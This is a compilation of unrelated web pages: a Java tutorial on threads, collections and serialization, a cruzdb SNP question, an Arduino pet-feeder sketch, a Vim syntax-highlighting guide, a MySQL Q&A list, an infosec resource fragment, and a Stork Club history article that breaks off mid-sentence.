3. Learn from a Book
4. Learn from a Course
5. University
6. Capture the Flag and War Games
7. Communication
8. Meet People
9. Conferences
10. Certifications
11. Links
12. Friends of the Class

* Information Security Conferences Calendar at [56]. [57]

If you're working somewhere and are having trouble justifying conference attendance to your company, the Infosec Leaders blog has some helpful advice. [58]

[==================================================================================================]
-=[
[==================================================================================================]
http://packetstormsecurity.org/files/107385/Go-Null-Yourself-E-Zine-Issue-06.html
Question: Using cruzdb to retrieve SNP sequence including flanking

I want to use cruzdb to query a list of SNPs by rs id in a text file and retrieve sequence including 200 basepairs flanking each SNP. I can do this in the UCSC genome browser table by selecting "Output format" = sequence. I have some code below that I sketched together from previous posts.

from cruzdb import Genome
import sys

file_in = sys.argv[1]
file_handle = open(file_in, 'rb')

hg19 = Genome(db='hg19')
snp147 = hg19.snp147

for rs in file_handle:
    rs = rs.split()[0].strip('\n')
    if rs.startswith("rs"):
        print snp147.filter_by(name=rs).first()

Unfortunately, there is no sequence information here. I also ran across the snp sequence database but not sure how to use it.

hg19.snp147Seq.filter_by(name='rs9923231')
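One way to get partway there without the snp147Seq table: each snp147 row carries chrom, chromStart, and chromEnd, so the flanking window can be computed from the row and then handed to whatever sequence source is convenient (UCSC DAS, a local FASTA/2bit, etc.). Below is a sketch of just the coordinate arithmetic — the positions are invented, and the field names merely follow the UCSC snp147 schema:

```python
def flanking_window(chrom_start, chrom_end, flank=200):
    """0-based half-open interval covering the SNP plus `flank` bp on each
    side, clamped at the start of the chromosome."""
    return max(0, chrom_start - flank), chrom_end + flank

# e.g. a 1 bp SNP with chromStart=11856377, chromEnd=11856378 (invented values)
start, end = flanking_window(11856377, 11856378)
```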
https://www.biostars.org/p/254459/
Welcome to the Java Additional Topics tutorial offered by Simplilearn. The tutorial is a part of the Java Certification Training Course. Let us begin with the objectives of this tutorial in the next section.

The topics covered in this Java additional topics tutorial:
- Explain inner classes and inner interfaces
- Define the String API
- Define threads
- Examine the Collection framework
- Explain Comparable, Comparator, and other functional interfaces
- Identify file handling and serialization

Let us learn about Java inner classes and inner interfaces in the next section.

An inner class is a class declared inside a class or interface that can access all the members of the outer class, including private data members and methods.

class Outer_class {
    //code
    class Inner_class {
        //code
    }
}

The code snippet above gives the scope of the outer class; within the outer class, we have defined an inner class. The advantages of doing so include:
- The inner class has access to all data members and methods of the outer class, including private ones.
- It leads to more maintainable and readable code.
- It requires less coding effort.

Inner classes are also referred to as nested classes.

An inner interface, also known as a nested interface, is an interface declared inside another interface.

public interface Map {
    interface Entry {
        int getKey();
    }
    void clear();
}

Here we see the outer interface, and within it an inner interface has been declared. The advantages include:
- Inner interfaces can be used to group related interfaces together.
- Encapsulation can be achieved using inner interfaces.
- They help keep code maintainable and readable.

In the next section, we will learn about Java threads.

A thread is an independent path of execution within a program.
The java.lang.Thread class enables you to create and control threads. A Java thread is composed of three main parts:
- the virtual CPU,
- the code that the CPU executes, and
- the data on which the code works.

When you run public static void main, you are typically running a single process on your processor, although the processor has much more capability. Whenever the processor has spare time, we can run parallel processes alongside the main thread so that the processor's time is used effectively. Hence, within the main thread that is already running, we can start parallel child threads, so that idle processor time is used for parallel processing. Each thread can then be assigned work, such as a function or code block to execute.

A Java thread can be created by extending the Thread class or by implementing the Runnable interface. Commonly used constructors of the Thread class include:

Thread()
Thread(String name)
Thread(Runnable r)
Thread(Runnable r, String name)

They accept either a string name for the thread, a Runnable object, or both.

To create a thread, implementing the java.lang.Runnable interface is preferred over inheriting from java.lang.Thread. Since Java doesn't support multiple inheritance, a class that extends Thread loses the chance to extend or inherit from any other class. Implementing the Runnable interface also makes the code more maintainable, as it logically separates the task from the runner. In object-oriented programming, extending a class means modifying or improving the existing class, so implementing Runnable is good practice.
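The two creation styles just described can be sketched in a compact, runnable form. The class names and the shared counter below are illustrative, not from the tutorial:

```java
import java.util.concurrent.atomic.AtomicInteger;

// Sketch: creating a thread by extending Thread vs. implementing Runnable.
class GreeterThread extends Thread {
    @Override
    public void run() {
        CreationDemo.runs.incrementAndGet();   // record that this thread ran
    }
}

class GreeterTask implements Runnable {        // preferred: task separated from runner
    @Override
    public void run() {
        CreationDemo.runs.incrementAndGet();
    }
}

public class CreationDemo {
    static final AtomicInteger runs = new AtomicInteger();

    public static void main(String[] args) {
        Thread t1 = new GreeterThread();             // inheritance style
        Thread t2 = new Thread(new GreeterTask());   // composition style
        t1.start();
        t2.start();
        try {
            t1.join();   // wait for both threads to finish
            t2.join();
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        }
        System.out.println("Threads run: " + runs.get());   // prints 2
    }
}
```

Note that `GreeterTask` could still extend some other class, which is exactly the flexibility the tutorial recommends.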
There are two ways in which we can create a thread. One is to inherit from the Thread class, in which case you cannot inherit from any other class, since Java follows single inheritance. The other, better way is to implement the Runnable interface, after which you can still inherit from a class of your choice. In the next section, let us look at an example of creating a Java thread.

Here, we have two classes, ThreadTester and HelloRunner. The HelloRunner class implements the Runnable interface. The run method, defined by the Runnable interface, is the method that will be called the moment we start the thread.

class HelloRunner implements Runnable {
    public void run() {
        for (int i = 0; i < 5; i++) {
            System.out.println("Hello from thread " + Thread.currentThread().getName());
        }
    }
}

public class ThreadTester {
    public static void main(String[] args) {
        Thread t = new Thread(new HelloRunner());
        t.start();
    }
}

In the next section, we will look at synchronizing a Java thread.

The synchronized keyword enables a programmer to control threads that share data. Synchronization can be applied in two ways: to a block of code (a synchronized statement) or to a method. Every object is associated with a flag called the object lock flag, and this flag is what the synchronized keyword acquires.

When a thread reaches a synchronized statement, it examines the object passed as the argument and tries to obtain the lock flag from that object before continuing to the next step. The moment that code block is reached, the thread tries to acquire the lock over the block of code and only then proceeds with executing it. A thread acquires a lock in the same way when it calls a synchronized method. In the next section, we will learn about Java deadlock.

Deadlock is a part of Java multithreading.
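Before moving on to deadlock, here is a minimal runnable sketch of the synchronized block just described: two threads update a shared counter, and the synchronized statement acquires the lock flag of the `lock` object before each update. Names and counts are illustrative:

```java
// Sketch: two threads incrementing a shared counter under a synchronized block.
public class SyncDemo {
    private static final Object lock = new Object();
    static int counter = 0;

    public static void main(String[] args) {
        Runnable task = () -> {
            for (int i = 0; i < 10_000; i++) {
                synchronized (lock) {   // obtain the object's lock flag
                    counter++;
                }
            }
        };
        Thread t1 = new Thread(task);
        Thread t2 = new Thread(task);
        t1.start();
        t2.start();
        try {
            t1.join();
            t2.join();
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        }
        System.out.println("Final count: " + counter);   // always 20000 with synchronization
    }
}
```

Without the synchronized block, the two unsynchronized `counter++` updates could interleave and some increments would be lost.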
It occurs when a thread is waiting for an object lock that is held by another thread, while that other thread is waiting for an object lock that is already held by the first thread. Let us understand deadlock with an example.

public class TestThread {
    public static Object Lock1 = new Object();
    public static Object Lock2 = new Object();

    public static void main(String args[]) {
        Thread1 T1 = new Thread1();
        Thread2 T2 = new Thread2();
        T1.start();
        T2.start();
    }

    private static class Thread1 extends Thread {
        public void run() {
            synchronized (Lock1) {
                System.out.println("Thread 1: Hold lock 1...");
                try { Thread.sleep(15); } catch (InterruptedException e) {}
                System.out.println("Thread 1: Wait for lock 2...");
                synchronized (Lock2) {
                    System.out.println("Thread 1: Hold lock 1 & 2...");
                }
            }
        }
    }

    private static class Thread2 extends Thread {
        public void run() {
            synchronized (Lock2) {
                System.out.println("Thread 2: Hold lock 2...");
                try { Thread.sleep(10); } catch (InterruptedException e) {}
                System.out.println("Thread 2: Wait for lock 1...");
                synchronized (Lock1) {
                    System.out.println("Thread 2: Hold lock 1 & 2...");
                }
            }
        }
    }
}

Output:
Thread 1: Hold lock 1...
Thread 2: Hold lock 2...
Thread 1: Wait for lock 2...
Thread 2: Wait for lock 1...

In the next section, we will look at the Java collection framework, part of the java.util package. The java.util.Collections class consists exclusively of static methods that operate on or return collections. It contains polymorphic algorithms that operate on collections, "wrappers" (which return a new collection backed by a specified collection), and a few other odds and ends. The methods of this class all throw a NullPointerException if the collections or class objects provided to them are null.

There are several general-purpose implementations of the core interfaces (Set, List, and Map) available as part of the Collection framework.
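The "wrappers" mentioned above can be seen in a short runnable sketch. The list contents and class name are illustrative; the point is that the wrapper is backed by the original collection:

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

public class WrapperDemo {
    // Collections.unmodifiableList returns a wrapper backed by the original list:
    // reads pass through, writes throw UnsupportedOperationException.
    public static List<String> readOnlyView(List<String> base) {
        return Collections.unmodifiableList(base);
    }

    public static void main(String[] args) {
        List<String> base = new ArrayList<>();
        base.add("alpha");
        List<String> view = readOnlyView(base);
        base.add("beta");             // a change through the backing list...
        System.out.println(view);     // ...is visible through the wrapper: [alpha, beta]
        try {
            view.add("gamma");        // writing through the wrapper fails
        } catch (UnsupportedOperationException e) {
            System.out.println("wrapper is read-only");
        }
    }
}
```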
This allows us to store information in memory without the restriction of an array: an array has a fixed size, whereas collections do not.

General-purpose collection implementations: let us now look at an example of the HashSet.

import java.util.HashSet;
import java.util.Set;

public class HashSetExample {
    public static void main(String args[]) {
        // HashSet declaration, specialized to the type String
        Set<String> names = new HashSet<String>();
        names.add("Ajit");
        names.add("Sam");
        names.add("Sam");   // a duplicate value: the set stores only one copy
        names.add(null);    // a null value is accepted
        System.out.println(names);
    }
}

The declaration of the HashSet is specialized to the type String, so it will only accept strings. We then add a few values to the HashSet. Note that a set does not accept duplicate values: although we add the same value twice in our code, the set stores only one copy. We can, however, add a null value, as collections store reference types and references are allowed to point to nothing.

This is an example of the ArrayList.

import java.util.ArrayList;
import java.util.List;

public class ArrayListExample {
    public static void main(String args[]) {
        /* Creation of ArrayList: we add String elements, so it is of type String */
        List<String> obj = new ArrayList<String>();
        /* This is how elements are added to the array list */
        obj.add("Ajit");
        obj.add("Sam");
        obj.add("Robert");
        obj.add("Steve");
        obj.add("Soumya");
        /* Displaying array list elements */
        System.out.println("Currently the array list has following elements:" + obj);
        /* Add elements at the given index */
        obj.add(0, "Rahul");
        obj.add(1, "Justin");
    }
}

Here, we create a List object and specialize it to an ArrayList with a generic type of String, which means it can take only strings. We then add a few string values, and then we can print out the entire list.

Let us now look at the next collection, which is the HashMap. In the following example, at the start of the program we create an object of the Map type. The map takes a key and a value. We specialize the key to Integer, so that every key is of type int, and the value corresponding to each key is of type String.
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;

public class Details {
    public static void main(String args[]) {
        /* This is how to declare a HashMap */
        Map<Integer, String> hmap = new HashMap<Integer, String>();
        /* Adding elements to the HashMap */
        hmap.put(1, "Sam");
        hmap.put(2, "Rahul");
        hmap.put(3, "Singh");
        hmap.put(9, "Ajeet");
        hmap.put(14, "Anuj");
        /* Display the content of the HashMap using an Iterator */
        Iterator<Map.Entry<Integer, String>> it = hmap.entrySet().iterator();
        while (it.hasNext()) {
            Map.Entry<Integer, String> e = it.next();
            System.out.print("key is: " + e.getKey() + " & Value is: ");
            System.out.println(e.getValue());
        }
        /* Get a value based on its key */
        String var = hmap.get(2);
        System.out.println("Value at key 2 is: " + var);
    }
}

This is the hierarchy of the collection framework. Three interfaces inherit from java.util.Collection: List, Queue, and Set. In terms of lists, we have the ArrayList that we used earlier; in terms of queues, we have LinkedList and PriorityQueue; and in terms of sets, which hold unique values, we have the HashSet. In terms of the Map interface, which holds key-value pairs, we have HashMap, Hashtable, SortedMap, and TreeMap. These classes provide a hash-table, or key-value, storage mechanism.

The Comparable interface is a member of the java.lang package. By implementing the Comparable interface, you can provide an order to objects of any class. You can also sort collections that contain objects of classes that implement the Comparable interface. Some Java classes that implement the Comparable interface are Byte, Long, String, Date, and Float. To write custom comparable types, you need to implement the compareTo method of the Comparable interface. This compareTo method is used specifically when we are sorting custom objects.
We can use it to evaluate whether the value of one object is larger than another object's, and accordingly decide how to sort those objects. In the next section, we will learn about the Java Comparator.

The Comparator interface is used to order the objects of a user-defined class. For example, consider the Student class described previously; there, the sorting of students was restricted to sorting on GPAs. A comparator object is capable of comparing two objects of two different classes. In the next section, we will look at a Java Comparable and Comparator example.

Let us see an example. We create a new package called comparable_comparator_demo and a class called Bus that implements the Comparable interface, specialized to the type Bus. We have getters and setters for the bus id and the bus name to retrieve and store values, and also for the fare and the ratings.

package comparable_comparator_demo;

public class Bus implements Comparable<Bus> {
    private Integer busId;
    private String busName;
    private Double fare;
    private Double ratings;

    public Integer getBusId() { return busId; }
    public void setBusId(Integer busId) { this.busId = busId; }
    public String getBusName() { return busName; }
    public void setBusName(String busName) { this.busName = busName; }
    public Double getFare() { return fare; }
    public void setFare(Double fare) { this.fare = fare; }
    public Double getRatings() { return ratings; }
    public void setRatings(Double ratings) { this.ratings = ratings; }

    @Override
    public String toString() {
        return "Bus [busId=" + busId + ", busName=" + busName + ", fare=" + fare + ", ratings=" + ratings + "]";
    }

    public Bus() {
    }

    public Bus(Integer busId, String busName, Double fare, Double ratings) {
        super();
        this.busId = busId;
        this.busName = busName;
        this.fare = fare;
        this.ratings = ratings;
    }

    @Override
    public int compareTo(Bus o) {
        return o.busId.compareTo(this.busId);   // natural order: busId, descending
    }
}
From the above example, we will now create the main class:

package comparable_comparator_demo;

import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

public class BusMain {
    public static void main(String[] args) {
        Bus b1 = new Bus(1000, "Wipro Travels", 1500.50d, 4.8d);
        Bus b2 = new Bus(1200, "Java Travels", 1200.50d, 3.8d);
        Bus b3 = new Bus(1100, "J2EE Travels", 1750.50d, 4.9d);
        Bus b4 = new Bus(1010, "JME Travels", 1250.50d, 2.1d);
        Bus b5 = new Bus(1001, "List Travels", 1100.50d, 3.2d);
        Bus b6 = new Bus(1900, "WOOW Travels", 1800.50d, 4.1d);

        List<Bus> busList = new ArrayList<>();
        busList.add(b1);
        busList.add(b2);
        busList.add(b3);
        busList.add(b4);
        busList.add(b5);
        busList.add(b6);

        Collections.sort(busList);   // natural order, via Comparable
        System.out.println("Printing all the buses");
        for (int i = 0; i < busList.size(); i++) {
            System.out.println(busList.get(i));
        }
        System.out.println();

        Collections.sort(busList, new FareComparator());
        System.out.println("Printing all the buses sorted based on Fare");
        for (int i = 0; i < busList.size(); i++) {
            System.out.println(busList.get(i));
        }
        System.out.println();

        Collections.sort(busList, new RatingComparator());
        System.out.println("Printing all the buses sorted based on Ratings");
        for (int i = 0; i < busList.size(); i++) {
            System.out.println(busList.get(i));
        }

        System.out.println("Printing buses using foreach");
        for (Bus b : busList) {
            System.out.println(b);
        }
    }
}

The RatingComparator from the example:

package comparable_comparator_demo;

import java.util.Comparator;

public class RatingComparator implements Comparator<Bus> {
    @Override
    public int compare(Bus o1, Bus o2) {
        return o2.getRatings().compareTo(o1.getRatings());   // descending by rating
    }
}

The FareComparator from the example:

package comparable_comparator_demo;

import java.util.Comparator;

public class FareComparator implements Comparator<Bus> {
    @Override
    public int compare(Bus o1, Bus o2) {
        return o1.getFare().compareTo(o2.getFare());   // ascending by fare
    }
}

An Iterator is used for looping through collection classes such as HashMap, ArrayList, LinkedList, and so on. It is used to traverse collection elements one by one, and it is applicable to all Collection classes; therefore it is also known as the universal Java cursor. It supports both READ and REMOVE operations. The syntax of iterator():

Iterator<E> iterator()

Let us now look at an example of the iterator. Here, we import three classes: Iterator, LinkedList, and List. We create an object of type LinkedList and add three names to it: John, James, and Joseph.

import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;

public class ExternalIteratorDemo {
    public static void main(String[] args) {
        List<String> names = new LinkedList<>();
        names.add("John");
        names.add("James");
        names.add("Joseph");
        // Getting the Iterator
        Iterator<String> namesIterator = names.iterator();
        while (namesIterator.hasNext()) {
            // Traversing elements
            System.out.println(namesIterator.next());
        }
    }
}

The for-each loop in Java is used to make the code more readable and to eliminate programming errors. The syntax of the for-each loop:

for (data_type variable : array | collection) {
}

Let us now look at an example of the for-each loop. We have a simple integer array that holds four elements.

class ForEachExample1 {
    public static void main(String args[]) {
        int arr[] = {17, 26, 65, 24};
        for (int i : arr) {
            System.out.println(i);
        }
    }
}

Output:
17
26
65
24

The various Java file handling operations include creating File objects, manipulating File objects, and reading and writing file streams. File handling is saving data by creating a file on your file system. The file could be a text file, a binary file, or an XML file. You can also manipulate those files by opening them, deleting them, inserting data, appending data to the file, and so on.
While reading and writing, we make use of a file stream. We can accumulate data in the stream and flush it into the file in one shot. Hence, instead of many round trips to the file, we make a single one. This is what is meant by file streaming: the stream is a temporary storage area, so we are not required to keep doing I/O operations. Reading from and writing to the file frequently is expensive from a performance perspective and degrades the performance of the application; buffering through a stream prevents that degradation.

The File class provides several utilities for handling files and obtaining information about them. You can create a File object that represents a directory and then use it to identify other files:

File myFile;
myFile = new File("myfile.txt");
myFile = new File("MyDocs", "myfile.txt");

File myDir = new File("MyDocs");
myFile = new File(myDir, "myfile.txt");

After creating a File object, we can use the following methods to gather information about the file.

File names — methods that return file names:
String getName()
String getPath()
String getAbsolutePath()
String getParent()
boolean renameTo(File newname)

General file information and utilities:
long lastModified()
long length()
boolean delete()

Directory utilities:
boolean mkdir()
String[] list()

File tests — methods that report file attributes:
boolean exists()
boolean canWrite()
boolean canRead()
boolean isFile()
boolean isDirectory()
boolean isAbsolute()
boolean isHidden()

In Java, we can use java.io.BufferedReader to read content from a file.
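A few of the File utility methods listed above can be exercised in a small self-contained sketch. It uses a temporary file so it leaves no clutter behind; the file name and contents are illustrative:

```java
import java.io.File;
import java.io.FileWriter;
import java.io.IOException;

public class FileInfoDemo {
    // Print a few File attributes and return the file's length in bytes.
    // File's query methods do not throw; a missing file reports length 0.
    public static long describe(File f) {
        System.out.println("Name: " + f.getName());
        System.out.println("Absolute path: " + f.getAbsolutePath());
        System.out.println("Exists: " + f.exists() + ", readable: " + f.canRead());
        return f.length();
    }

    public static void main(String[] args) throws IOException {
        File f = File.createTempFile("demo", ".txt");   // temp file keeps the sketch self-contained
        try (FileWriter w = new FileWriter(f)) {
            w.write("hello");
        }
        System.out.println("Length: " + describe(f));   // 5 bytes
        f.delete();                                     // clean up
    }
}
```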
import java.io.*;

public class ReadFile {
    public static void main(String[] args) {
        File file = new File(args[0]);
        try {
            // Create a buffered reader to read each line from the file.
            BufferedReader in = new BufferedReader(new FileReader(file));
            String s;
            try {
                // Read each line from the file
                s = in.readLine();
                while (s != null) {
                    System.out.println("Read: " + s);
                    s = in.readLine();
                }
            } finally {
                // Close the buffered reader
                in.close();
            }
        } catch (FileNotFoundException e1) {
            // If this file does not exist
            System.err.println("File not found: " + file);
        } catch (IOException e2) {
            // Catch any other IO exceptions.
            e2.printStackTrace();
        }
    }
}

To write a file, we make use of the following method:

Files.write(Paths.get(fileName), content.getBytes(), StandardOpenOption.CREATE);

Serialization is a mechanism for saving objects as a sequence of bytes and rebuilding the byte sequence back into a copy of the object later. For a class to be serialized, it must implement the java.io.Serializable interface. The Serializable interface has no methods and only serves as a marker indicating that the implementing class can be considered for serialization.

The difference between file I/O and serialization is that in file I/O we simply take data and save it to a file, whereas in serialization we save an object. Serialization stores data along with its structure, so we can serialize an entire object to a file and later retrieve both the state and the structure of the object; the reverse process is called deserialization.

When a field is a reference to an object, the fields of that referenced object are also serialized if that object's class is serializable. The tree or structure of an object's fields, including these sub-objects, constitutes the object graph.
If the object graph contains a non-serializable object reference, the object can still be serialized if that reference is marked with the transient keyword.

public class MyClass implements Serializable {
    public transient Thread myThread;
    private String customerID;
    private int total;
}

From this example, let us learn how exactly serialization is done. Here, we create a new Date object and put the serialization code in a try block, because saving data to a file has a high probability of raising an exception. We create a file output stream for a file named date.ser, then we create an object output stream, passing it the reference f, where f is the stream for the file to save to.

public class SerializeDate {
    SerializeDate() {
        Date d = new Date();
        try {
            FileOutputStream f = new FileOutputStream("date.ser");
            ObjectOutputStream s = new ObjectOutputStream(f);
            s.writeObject(d);   // Serialization starts here
            s.close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public static void main(String args[]) {
        new SerializeDate();
    }
}

After serializing the data in the previous example, we will now look at deserializing it: converting the data we have saved in the file back into an object. We create a Date object and assign it null. We create an object input stream and pass it a reference to the file stream f. Then s.readObject() reads the object from the file date.ser; we cast it to the type Date and store the result in d.
public class DeSerializeDate {
    DeSerializeDate() {
        Date d = null;
        try {
            FileInputStream f = new FileInputStream("date.ser");
            ObjectInputStream s = new ObjectInputStream(f);
            d = (Date) s.readObject();   // Deserialization starts here
            s.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
        System.out.println("Deserialized Date object from date.ser");
        System.out.println("Date: " + d);
    }

    public static void main(String args[]) {
        new DeSerializeDate();
    }
}

Let us summarize what we have learned in this Java additional topics tutorial:
- A Java inner class, or nested class, is a class that is declared inside a class or interface.
- There are several general-purpose implementations of the core interfaces (Set, List, and Map) in the Collection framework.
- A thread is an independent path of execution within a program.
- By implementing the Comparable interface, you can provide an order to the objects of any class; the Comparator interface provides greater flexibility with ordering.
- Serialization is a mechanism for saving objects as a sequence of bytes and rebuilding the byte sequence back into a copy of the object later.

Thus, we come to the end of the Java Additional Topics tutorial.
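As a footnote to the SerializeDate/DeSerializeDate pair above, the same round trip can be condensed into one in-memory sketch using byte-array streams instead of the date.ser file. The class and method names here are illustrative:

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Date;

public class SerializeRoundTrip {
    // Serialize any serializable object to bytes and rebuild a copy from them.
    public static Object roundTrip(Serializable obj) {
        try {
            ByteArrayOutputStream bytes = new ByteArrayOutputStream();
            try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
                out.writeObject(obj);                 // serialization
            }
            try (ObjectInputStream in = new ObjectInputStream(
                    new ByteArrayInputStream(bytes.toByteArray()))) {
                return in.readObject();               // deserialization
            }
        } catch (IOException | ClassNotFoundException e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        Date d = new Date();
        Date copy = (Date) roundTrip(d);
        System.out.println("Equal after round trip: " + d.equals(copy));   // true
    }
}
```

The rebuilt object is a distinct instance that compares equal to the original, which is exactly the "copy of the object" the tutorial describes.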
https://www.simplilearn.com/additional-core-java-topics-tutorial
Question: What are the functionalities of MySQL Workbench?

Answers (truncated excerpts):
* The functionalities of MySQL Workbench are as follows: MyISAM is the default table that is ... READ MORE
* The following TRIGGERS are allowed in MySQL: BEFORE ... READ MORE
* You can try out the following query: INSERT ... READ MORE
* using MySql.Data; using MySql.Data.MySqlClient; namespace Data { ... READ MORE
* MySQL Workbench is mainly available in three ... READ MORE
* There are mainly two MySQL Enterprise Backup ... READ MORE
* There are majorly three ways to export ... READ MORE
* If you are using MySql workbench then ... READ MORE
* MySQL Workbench is a designing or a ... READ MORE
* You can add commas to the left and ... READ MORE
https://www.edureka.co/community/31720/mysql-workbench-functionalities
First: Materials

We are going to use an Altair. It will have an AC adapter and a SERVO motor connected. The actions the Altair will support are:
- Serve a little bit
- Serve half
- Serve a lot
- Toggle (manual)

The only differences among the modes are the time the servo motor stays open and the aperture. Additionally, the manual mode was created in order to clean the system. The materials used for this tutorial were:
- 2 Altairs
- 1 Servo motor
- 2 Clamps
- 1 Empty water bottle
- 1 Cutter

Of course you can make your own design; I made it with materials I found in my house. The other Altair will be used as the hub, so we can interact with the feeder via Internet. Additionally, I used a 5V, 500mA AC adapter plugged into the Altair.

Step 2: Making Of

The explanation of the code is made entirely inside the code as comments. Whatever doubt you have, feel free to ask.
#include <Wire.h>
#include <Mesh.h>             //This header is for the Aquila-only functions
#include <AquilaProtocol.h>   //This header is for the Aquila-only functions
#include <Servo.h>            //Header needed for making use of the servo functions

Servo a;                      //Here we name the servo 'a', so we can call it
int pos = 0;
bool isClosed = true;         //This variable is for the toggle function only

//This applies to the next 3 functions:
//a.write(N) moves the servo to position N when the function begins (servos move
//from 0 to 180 degrees). After this, it waits (delay) for M milliseconds;
//1000 ms = 1 second. After the delay, it writes a new position to the servo, in
//this case 9, the angle at which THIS servo in particular won't force (this
//varies among servos; they don't cover their entire 180 degrees, and you'll hear
//a buzz if you're exceeding the limit).

bool serve1(uint8_t param, bool gotParam) {
  a.write(80);
  delay(1000);
  a.write(9);
}

bool serve2(uint8_t param, bool gotParam) {
  a.write(50);
  delay(1000);
  a.write(9);
}

bool serve3(uint8_t param, bool gotParam) {
  a.write(40);
  delay(650);
  a.write(9);
}

//The toggle function is based on the previous functions. It checks whether the
//servo is opened or closed and proceeds to close or open it accordingly.
bool toggle(uint8_t param, bool gotParam) {
  if (isClosed) {
    isClosed = false;
    a.write(80);
  } else {
    isClosed = true;
    a.write(9);
  }
}

void setup() {
  a.attach(9);   //Servo motor plugged into Altair's pin 9.
  a.write(9);    //The servo stops vibrating/buzzing at 9 degrees, so its initial
                 //(closed) position is 9. (It's mere coincidence that the pin and
                 //degrees are the same.)
  Mesh.begin();
  Aquila.begin();
  Aquila.setClass("mx.makerlab.test");
  Aquila.setName("Feeder");
  //The text in quotes is what will appear on the hub as a button. Right after the
  //quoted text is the name of the function that will be called whenever the button
  //on the hub is clicked. This is an Aquila-only function.
  Aquila.addAction("Serve a lot", serve1);
  Aquila.addAction("Serve half", serve2);
  Aquila.addAction("Serve a little bit", serve3);
  Aquila.addAction("Toggle", toggle);
  Mesh.announce(HUB);   //This line is needed for this Altair to appear on the hub
}

void loop() {
  Mesh.loop();
  Aquila.loop();
}

2 Discussions

4 years ago on Introduction

This is great! Have you already tried it? Which kind of food will it dispense? I am planning to build something similar, but my concern is that food may get stuck between the cap and the bottle. Would this lead the servo to force and overheat?

Reply, 4 years ago on Introduction

Thanks for commenting! And yes, we've already tried it! Although our dispenser was a mere prototype and we've only tried it with some candies and dog food, we had no problems with that. Consider materials of the same size, cereal for instance.
I'd recommend changing the materials and design if you want to use it on a daily basis. :)
https://www.instructables.com/id/Make-a-Pet-Feeder-using-Altair/
Vim is an old and popular text editor whose roots go back to vi; Vim is the improved version of vi. Vim has a lot of features that make users' lives better. One of the most loved Vim features is syntax highlighting, which makes text or code easily readable by coloring statements.

For this tutorial we will use the following C code. Save this file as my.c:

#include "stdio.h"

int main(){
    if(1==1)
        printf("I love Poftut.com\n");
}

Open File With Vim

We will open the file with vim and insert the code above.

$ vim my.c

Press i to switch to insert mode, paste the code above, and then save it with Escape followed by :w

Turn On Highlighting

We will use the :syntax on command in vim in order to turn on or enable syntax highlighting:

:syntax on

Turn Off Highlighting

We will give the following command to turn it off:

:syntax off

Make Highlighting Setting Persistent

The highlighting setting can be made persistent by adding it to a configuration file. There are two configuration files for vim. The first is the user configuration file, which applies only to the current user and is located in that user's home directory; it is the preferred place for personal settings:

$ echo "syntax on" >> ~/.vimrc

The second configuration file is system-wide and located at /etc/vim/vimrc. The same setting can be added to this file, but the operation requires root privileges. Note that `sudo echo "syntax on" >> /etc/vim/vimrc` does not work as expected, because the redirection is performed by the unprivileged shell; use tee instead:

$ echo "syntax on" | sudo tee -a /etc/vim/vimrc
https://www.poftut.com/vim-syntax-highlighting-turn-off/
Coordinates: 40°45′37″N 73°58′32″W / 40.76028°N 73.97556°W / 40.76028; -73.97556 The Stork Club was a famous nightclub in New York City from 1929 to 1965. From 1934 onwards, it was located at 3 East 53rd Street, just east of Fifth Avenue. The building was demolished in 1966 and the site is now the location of Paley Park. The Stork Club was owned and operated by Sherman Billingsley (1896-1966), an ex-bootlegger who came to New York from Enid, Oklahoma [1]. From the end of Prohibition until the early 1960s, the club was the symbol of Café Society. Movie stars, celebrities, the wealthy, showgirls, and aristocrats all mixed here. El Morocco had the sophistication, and Toots Shor's drew the sporting crowd, but the Stork Club mixed power, money, and glamour. The Stork Club first opened in 1929 at 132 West 58th Street [2], just down the block from Billingsley's apartment at 152 West 58th Street[3]. Prohibition agents closed the club on December 22, 1931 and it moved to East 51st Street for three years [4]. In 1934, the Stork Club moved to 3 East 53rd Street, where it remained until it closed on October 4, 1965. According to Ralph Blumenthal in his 2000 book Stork Club, another New York nightclub owner named Tex Guinan (Mary Louise Cecilia Guinan) introduced Billingsley to her friend, the entertainment and gossip columnist Walter Winchell, in 1930. In his column in the Daily Mirror, Winchell once called the Stork Club "New York's New Yorkiest place on W. 58th". The activities of the "boldface" celebrities at the Stork Club were chronicled by the "orchidaceous oracle of cafe society," Lucius Beebe, in his syndicated column "This New York." The notable guests included Ernest Hemingway, Charlie Chaplin, J. 
Edgar Hoover, Frank Costello, Dorothy Kilgallen, the Duke and Duchess of Windsor (once given the cold shoulder there by Winchell), the Kennedys, Elizabeth Taylor, Gloria Vanderbilt, the Roosevelts, the Harrimans, Frank Sinatra, the Nordstrom Sisters, Brenda Frazier, Gene Tierney, Judy Garland, Erik Rhodes, Lucille Ball, Marilyn Monroe, Bing Crosby, Tallulah Bankhead, and Dorothy Lamour (who was turned down as a club singer by Billingsley early in her career). The sanctum sanctorum, the Cub Room ("the snub room"), was guarded by a captain known to everyone as "Saint Peter" (for the saint who guards the gates of Heaven). Billingsley's mistress for a number of years was Ethel Merman. One oft-repeated story involved Billingsley's alleged prejudice against non-white patrons. Arriving at the club with singer Lena Horne on his arm, actor George Jessel was stopped by Billingsley who was said to have inquired, "And just who made your reservation?" Never at a loss for words, Jessel replied, "Abraham Lincoln did". In 1951, Josephine Baker made charges of racism against the Stork Club after she ordered a steak and was still waiting for it an hour later. Actress Grace Kelly, who was at the club at the time, rushed over to Baker, took her by the arm and stormed out with her entire party, vowing to never return (and she never did) [5]. The Stork Club was a television series hosted by Billingsley, who circulated among the tables interviewing guests at the club. Sponsored by Fatima cigarettes, the series ran from 1950 to 1955. The Stork Club was also featured in several movies, including The Stork Club (1945), Executive Suite (1954), and My Favorite Year (1982). In Alfred Hitchcock's The Wrong Man (1956), Henry Fonda played Stork Club bass player Christopher Emanuel Balestrero, who was falsely accused of committing robberies around New York. Scenes involving Balestrero playing the bass were actually shot at the club. The film's 